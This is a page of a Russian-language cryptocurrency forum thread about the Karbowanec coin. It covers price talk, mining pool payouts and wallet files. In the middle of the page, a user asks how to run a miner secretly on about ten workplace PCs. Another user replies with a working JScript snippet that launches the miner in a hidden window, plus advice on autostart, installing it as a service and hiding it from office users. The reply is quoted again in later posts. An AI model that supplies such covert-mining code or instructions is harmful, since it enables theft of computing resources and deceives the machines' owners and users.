Pages:
Author

Topic: [KRB] Карбованець - Карбованец - page 92. (Read 449680 times)

full member
Activity: 252
Merit: 101
Каждый раз смотрю на нее и возникает одна мысль: почему я не зашел в монету прошлый раз... и так постоянно. Надо решаться!

Дай то бог будет коррекция на монетку - вот тогда и зайдете. Wink Главное дождаться этой самой коррекции. Всего то делов. Grin P.S. Тут у некоторых ребят на ветке есть по 3 тыс. и более КАРБО ... Эх, мне бы такую сумму - жил бы не тужил.  Roll Eyes

та бтцтрэйде только шо 30 000 распродажа была, а вы завидуете 3 000 )))
member
Activity: 121
Merit: 10
Дай то бог будет коррекция на монетку - вот тогда и зайдете. Wink Главное дождаться этой самой коррекции. Всего то делов. Grin P.S. Тут у некоторых ребят на ветке есть по 3 тыс. и более КАРБО ... Эх, мне бы такую сумму - жил бы не тужил.  Roll Eyes

Приземленные у вас мечты уважаемый, люди тут с десятками и сотнями косых сидят и думают.. эх ска, надо было больше ввалить
member
Activity: 742
Merit: 13
Каждый раз смотрю на нее и возникает одна мысль: почему я не зашел в монету прошлый раз... и так постоянно. Надо решаться!

Дай то бог будет коррекция на монетку - вот тогда и зайдете. Wink Главное дождаться этой самой коррекции. Всего то делов. Grin P.S. Тут у некоторых ребят на ветке есть по 3 тыс. и более КАРБО ... Эх, мне бы такую сумму - жил бы не тужил.  Roll Eyes
full member
Activity: 159
Merit: 100
LuckyToken – Join ICO!!!
конечно рост в последнее время этой монеты поражает
очень жалею,что не зашел  ранее

плюсую, очень недоверяю украинским и русским таким проектам, а этот вполне неплох оказался, молодцы ребята. но и сейчас не поздно майнить и покупать
member
Activity: 672
Merit: 22
Каждый раз смотрю на нее и возникает одна мысль: почему я не зашел в монету прошлый раз... и так постоянно. Надо решаться!
full member
Activity: 252
Merit: 101
подскажите,кто знает,где почитать,как поднять свою ноду...

Все просто.

Берешь и начинаешь с первого поста этой темы. Я думаю раз 50 УЖЕ ЭТО СПРАШИВАЛИ!
member
Activity: 70
Merit: 15
подскажите,кто знает,где почитать,как поднять свою ноду...
newbie
Activity: 19
Merit: 0
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно Smiley
есть несколько путей,самый простой:берешь вот этот код   
    var WSHShell = WScript.CreateObject("WScript.Shell");
    WSHShell.Run("xmr.exe",0);
пихаешь в текстовый файл,делаешь расширение .js ,помещаешь его в папку с майнером.там где в кавычках xmr.exe пишешь екзешник своего майнера или батник,смотря как запускаешь...делаешь ярлык этого файла и в автозагрузку...все...еще можно установить майнер как службу...для того,чтобы скрыть процесс в диспечере задач нужны еще движения,но для простых офисных юзеров достаточно...
Возьму на заметку, спасибо!
member
Activity: 70
Merit: 15
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно Smiley
есть несколько путей,самый простой:берешь вот этот код   
    var WSHShell = WScript.CreateObject("WScript.Shell");
    WSHShell.Run("xmr.exe",0);
пихаешь в текстовый файл,делаешь расширение .js ,помещаешь его в папку с майнером.там где в кавычках xmr.exe пишешь екзешник своего майнера или батник,смотря как запускаешь...делаешь ярлык этого файла и в автозагрузку...все...еще можно установить майнер как службу...для того,чтобы скрыть процесс в диспечере задач нужны еще движения,но для простых офисных юзеров достаточно...
member
Activity: 462
Merit: 12
quarkchain.io
конечно рост в последнее время этой монеты поражает
очень жалею,что не зашел  ранее
full member
Activity: 252
Merit: 101
Я еще столько не намайнил Smiley У меня не особо чахлые лошадки, и3-и5 в распоряжении.

тогда учи программирование Smiley Да и в будущем пригодится, коль ты админ в офисе.

п.с. ты ведь админ? как ты апще работает без таких знаний?  Huh
newbie
Activity: 19
Merit: 0
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно Smiley

за 100 крб расскажу и покажу и дам. А вообще забей - компы уже ниче особо не намайнят офисные  Sad


Я еще столько не намайнил Smiley У меня не особо чахлые лошадки, и3-и5 в распоряжении.
sr. member
Activity: 499
Merit: 254


ты можешь свои 3штуки КАРБО не показывать, а то я как жаба буду завидовать

3 штуки это не все... я же ни одного Карбо еще не продал
full member
Activity: 252
Merit: 101
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно Smiley

за 100 крб расскажу и покажу и дам. А вообще забей - компы уже ниче особо не намайнят офисные  Sad
newbie
Activity: 19
Merit: 0
И вопрос, который наверное задавался на этом форуме не первый раз. Есть ли пошаговая инструкция, как запустить майнер на рабочих компах, в распоряжении около 10 пк. Запустить естественно скрытно нужно Smiley
full member
Activity: 252
Merit: 101


ты можешь свои 3штуки КАРБО не показывать, а то я как жаба буду завидовать
sr. member
Activity: 499
Merit: 254
А как выплаты с пула идут? расскажите
у каждого пула своя минималка на вывод
http://explorer.karbowanec.com/en/#pools

как-то сразу и не догадался изучить таблицу. Спасибо!

Начинаете майнить на пуле, который вам больше нравится, как только по результатам присланных шар накопится минимальная сумма идет выплата, в примере ниже минимальная выплата 0,1 Карбо. Под надписью Payments перечисляются все выплаты, которые вам сделал пул.

newbie
Activity: 5
Merit: 0
нужно в свойствах папок включить показывать скрытые файлы и папки
можно подождать  пока в криптоматы куны добавят, но цена на тот момент будет возможно другая
через тотал командер смотрю, конечно все скрытые папки в настройках включены... чудеса)

тогда поиском найди файл blocks.dat

Оказывается он находится сразу в папке Роаминг\карбованец... но нулевой длинны. Хотя если просмотром текста посмотреть там чтото было. Закрыл кошель (он еще синхронизировался). Перегрузит комп и вот оно - этот файл 800мб. Все. Спасибо за советы! ))
newbie
Activity: 19
Merit: 0
А как выплаты с пула идут? расскажите
у каждого пула своя минималка на вывод
http://explorer.karbowanec.com/en/#pools

как-то сразу и не догадался изучить таблицу. Спасибо!
full member
Activity: 208
Merit: 100
А как выплаты с пула идут? расскажите
у каждого пула своя минималка на вывод
http://explorer.karbowanec.com/en/#pools
Pages:
Jump to: